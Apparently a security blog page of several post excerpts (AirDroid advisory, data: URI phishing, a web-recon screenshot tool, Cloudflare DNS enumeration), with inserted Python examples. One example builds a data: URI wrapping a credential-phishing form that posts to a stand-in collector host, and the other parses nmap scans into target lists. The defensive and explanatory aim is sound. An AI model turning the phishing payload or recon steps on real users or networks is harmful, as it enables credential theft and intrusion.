Hey guys, I’m posting here just for record keeping, but a vulnerability I found in the Android app AirDroid has been patched and has now been made public. See this blog post for more:

http://www.bishopfox.com/blog/2015/04/airdroid-how-much-do-your-apps-know/

Technical Advisory:

Phishing with data: URIs is not a new idea. The concept is relatively simple: take advantage of many users’ inexperience with how data: URIs function in order to trick them into entering credentials into a phishing page. We’ve seen this in the wild against Gmail users, for example, and we’ve even seen some cool attacks against Chrome using very long data: URIs. This post will explore how we can craft a data: URI to trick even more experienced users.

Before we start, for those new to the concept, data: URIs function like so:
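The following is an added example, not code from the original post: it builds and decodes data: URIs the way RFC 2397 defines them, and shows the check a defender needs when looking for data: links in mail or page content. The naive `href.startswith("data:")` test misses what a browser accepts, because the WHATWG URL parser strips leading and trailing control characters and spaces, removes every ASCII tab and newline, and matches the scheme case-insensitively. The login-form HTML is constructed for the demonstration and the function names are my own.

```python
"""Added example (not from the original post): building, decoding and
flagging data: URIs as defined in RFC 2397.  The sample HTML below is
constructed for the demonstration."""
import base64
from urllib.parse import quote, unquote

# Constructed sample: the kind of credential form a data: URI phish carries.
SAMPLE_FORM = (
    "<html><body><h1>Sign in</h1>"
    "<form action='https://collector.invalid/' method='post'>"
    "<input name='u'><input name='p' type='password'>"
    "<input type='submit'></form></body></html>"
)

# Everything a browser strips from the ends of a URL before parsing:
# C0 control characters (0x00-0x1F) and space (0x20).
_STRIP_CHARS = "".join(chr(c) for c in range(0x21))


def canonicalize_url(raw: str) -> str:
    """Apply the same pre-processing a browser does before reading the scheme:
    trim C0 controls/spaces at both ends, then drop all tabs and newlines."""
    trimmed = raw.strip(_STRIP_CHARS)
    return trimmed.replace("\t", "").replace("\n", "").replace("\r", "")


def is_data_uri(raw: str) -> bool:
    """True if a browser would treat this href as a data: URI.
    Catches '  DATA:text/html,...' and 'data\\n:text/html,...' which a
    plain startswith("data:") check lets through."""
    return canonicalize_url(raw).lower().startswith("data:")


def build_data_uri(body: str, mime: str = "text/html", use_base64: bool = True) -> str:
    """Encode `body` as a data: URI, either base64 or percent-encoded.
    Grammar: data:[<mediatype>][;base64],<data>"""
    if use_base64:
        payload = base64.b64encode(body.encode("utf-8")).decode("ascii")
        return f"data:{mime};base64,{payload}"
    return f"data:{mime},{quote(body, safe='')}"


def parse_data_uri(uri: str):
    """Return (mime, decoded_body) for a data: URI, or raise ValueError."""
    canon = canonicalize_url(uri)
    if not canon.lower().startswith("data:"):
        raise ValueError("not a data: URI")
    meta, sep, payload = canon[5:].partition(",")
    if not sep:
        raise ValueError("data: URI has no ',' separating metadata from payload")
    params = [p.strip() for p in meta.split(";")]
    is_b64 = params[-1].lower() == "base64"
    if is_b64:
        params = params[:-1]
    # RFC 2397: an empty mediatype defaults to text/plain.
    mime = params[0] if params and params[0] else "text/plain"
    if is_b64:
        # Browsers tolerate missing '=' padding; mirror that leniency.
        padded = payload + "=" * (-len(payload) % 4)
        body = base64.b64decode(padded).decode("utf-8")
    else:
        body = unquote(payload)
    return mime, body


if __name__ == "__main__":
    phish = build_data_uri(SAMPLE_FORM)
    print(phish[:60] + "...")
    mime, html = parse_data_uri(phish)
    print(mime, len(html), "bytes decoded")
    for href in ("  DATA:text/html,hi\n", "data\n:text/html,hi", "https://example.com/login"):
        print(repr(href), "->", is_data_uri(href))
```

Anything that inspects links for data: URIs (mail filters, link rewriters, log hunting) should canonicalize the way `is_data_uri` does; a scheme comparison on the raw string is bypassable with a leading space or an embedded newline. Note also that since Chrome 60 and Firefox 59 the browser refuses page-initiated top-frame navigations to data: URIs, so this style of phish now depends on the victim opening the link from outside the browser or pasting it into the address bar.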

When on an assessment that involves a very large number of IP addresses, it can often be hard to determine which hosts to go after. As a web hacker at heart, I’m primarily interested in the web services running on the target network. Given enough IPs, default credentials on web administration panels are basically guaranteed, but how can I quickly identify which web services are interesting?

One tool I’ve used is EyeWitness, which uses a headless instance of Ghost.py to take screenshots of web services. This is nice because there’s no browser involved, but I’ve had lots of problems with it. For one, you can’t see things like Flash or Java because Ghost.py doesn’t support them. It also has the bad habit of segfaulting in the middle of a scan, which is very frustrating when you’ve left it running overnight. While I’m certainly not bashing the tool (many of the bugs are probably the fault of Ghost.py anyway), I felt that a better solution could be created by using a full browser controlled by a custom extension.

After reading the Chrome extension API documentation and lots of Stack Overflow posts, I created wmap.
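Whatever takes the screenshots, the first step is deciding which host:port pairs on a large range are web services at all. The following is an added example, not wmap’s or EyeWitness’s own code: it parses nmap grepable (`-oG`) output and turns every open port that looks like HTTP or HTTPS into a URL to hand to a screenshot tool, choosing the scheme from nmap’s service name (nmap writes `ssl/http` as `ssl|http` in grepable output) and falling back to a port list when nmap could not name the service. The scan output and the port lists are constructed for the demonstration.

```python
"""Added example (not wmap's own code): turn a constructed nmap -oG
(grepable) result into the list of web URLs worth screenshotting."""
import re

# Constructed sample of nmap grepable output; not real scan data.
SAMPLE_GNMAP = """\
# Nmap 6.47 scan initiated (constructed sample)
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//ssl|http///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (996)
Host: 10.0.0.9 ()\tPorts: 8443/open/tcp//ssl|https-alt///, 3306/open/tcp//mysql///\tIgnored State: closed (998)
Host: 10.0.0.12 (printer.corp.example)\tPorts: 9100/open/tcp//jetdirect///, 8000/open/tcp/////\tIgnored State: closed (998)
# Nmap done (constructed sample)
"""

# Ports that commonly carry an HTTP(S) admin interface even when nmap could
# not name the service (assumption; extend for the target environment).
WEB_PORTS = {80, 81, 443, 8000, 8008, 8080, 8081, 8443, 8888}
HTTPS_PORTS = {443, 8443}

_HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_gnmap(text):
    """Yield (ip, hostname, port, state, service) for every TCP port entry."""
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        m = _HOST_RE.match(fields[0])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        ports_field = next((f for f in fields if f.startswith("Ports:")), None)
        if ports_field is None:
            continue  # "Status: Up" lines carry no port data
        for entry in ports_field[len("Ports:"):].split(","):
            parts = entry.strip().split("/")
            if len(parts) < 5:
                continue
            # grepable port fields: port/state/protocol/owner/service/rpc/version/
            port, state, proto, _owner, service = parts[:5]
            if proto != "tcp":
                continue
            yield ip, hostname, int(port), state, service


def choose_scheme(port, service):
    """Pick https/http from the service name first, then the port number;
    None means the port does not look like a web service."""
    svc = service.lower()
    if "ssl" in svc or "https" in svc or port in HTTPS_PORTS:
        return "https"
    if "http" in svc or port in WEB_PORTS:
        return "http"
    return None


def web_targets(text):
    """Return the deduplicated, scan-ordered list of URLs to screenshot.
    Uses the IP rather than the reverse-DNS name so that hosts without
    a proper virtual host still answer; add name-based URLs if the target
    relies on vhost routing."""
    urls = []
    for ip, _hostname, port, state, service in parse_gnmap(text):
        if state != "open":
            continue
        scheme = choose_scheme(port, service)
        if scheme is None:
            continue
        default_port = 443 if scheme == "https" else 80
        host = ip if port == default_port else f"{ip}:{port}"
        url = f"{scheme}://{host}"
        if url not in urls:
            urls.append(url)
    return urls


if __name__ == "__main__":
    for url in web_targets(SAMPLE_GNMAP):
        print(url)
```

Filtered ports are dropped because a screenshot tool would only waste its timeout on them; if the screenshotting browser refuses self-signed certificates, add a flag for the https entries before feeding the list in.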

Probably the cloud everyone is talking about

Enumeration of DNS data is nothing new. Usually it is accomplished through some combination of Google dorking, direct DNS querying, brute-forcing subdomains with a tool like SubBrute, or, if they happen to be enabled, DNS zone transfers. However, Cloudflare, a popular CDN and DDoS mitigation service, also has a very large internal database of DNS data waiting to be mined. The best part is that anyone can query this data just by attempting to set up the target domain on Cloudflare.

With the popular use of free software developed by inexperienced programmers, security vulnerabilities are becoming more and more frequent. With a new WordPress plugin exploit being released weekly, it begs the question: is it bad development or intentionally insecure software? Bring your tin foil hats as we take a hard look at the gray area surrounding software security negligence. Example offenders will be included, along with a discussion of developing zero-days for unreleased software.